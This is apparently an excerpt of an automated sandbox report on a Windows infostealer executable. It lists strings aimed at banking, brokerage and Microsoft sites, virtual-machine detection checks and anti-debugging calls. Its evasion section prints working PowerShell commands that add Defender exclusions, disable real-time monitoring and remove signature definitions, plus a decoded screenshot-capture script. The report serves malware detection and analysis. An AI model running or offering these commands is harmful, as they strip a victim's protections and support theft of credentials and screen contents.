              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: X9g8L63QGs.exe, 00000007.00000002.1693315105.000001E7C2586000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmware
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxservice
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d2qemu-ga
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport@
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3400000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Afecodevmsrvc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareservice
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: X9g8L63QGs.exe, 00000007.00000003.1595011521.000001E7C3017000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1487994418.000001E7C2F90000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A01000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A05000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2F90000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1478379972.000001E7C3A02000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxtray
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Wf8vmusrvc
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: >fvmtoolsd
              Source: getmac.exe, 0000004D.00000002.1482841194.0000028230D74000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1482040663.0000028230D4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Jfvmwareuser
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: X9g8L63QGs.exe, 00000007.00000003.1591685398.000001E7C39AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C266D19C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB121D0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,7_2_00007FFB1AB121D0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26834F0 GetProcessHeap,4_2_00007FF7C26834F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266D37C SetUnhandledExceptionFilter,4_2_00007FF7C266D37C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C266D19C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C266C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7C266C910
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C267A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF7C267A684
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C266D37C SetUnhandledExceptionFilter,7_2_00007FF7C266D37C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C266D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7C266D19C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C266C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF7C266C910
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C267A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF7C267A684
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0B8B3028 IsProcessorFeaturePresent,00007FFB1C261A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C261A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB0B8B3028
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB0C1ABE40 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB0C1ABE40
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1AB04630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1AB04630
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1B6F6524 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1B6F6524
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA49050 SetUnhandledExceptionFilter,7_2_00007FFB1BA49050
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA43328 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1BA43328
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BB1A9DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1BB1A9DC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1C260E08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FFB1C260E08
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1D341CD0 IsProcessorFeaturePresent,00007FFB1C261A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C261A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1D341CD0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1D5B1AA0 IsProcessorFeaturePresent,00007FFB1C261A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFB1C261A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FFB1D5B1AA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,97_2_00007FF7080F4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080EB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,97_2_00007FF7080EB52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080EA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,97_2_00007FF7080EA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080EB6D8 SetUnhandledExceptionFilter,97_2_00007FF7080EB6D8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
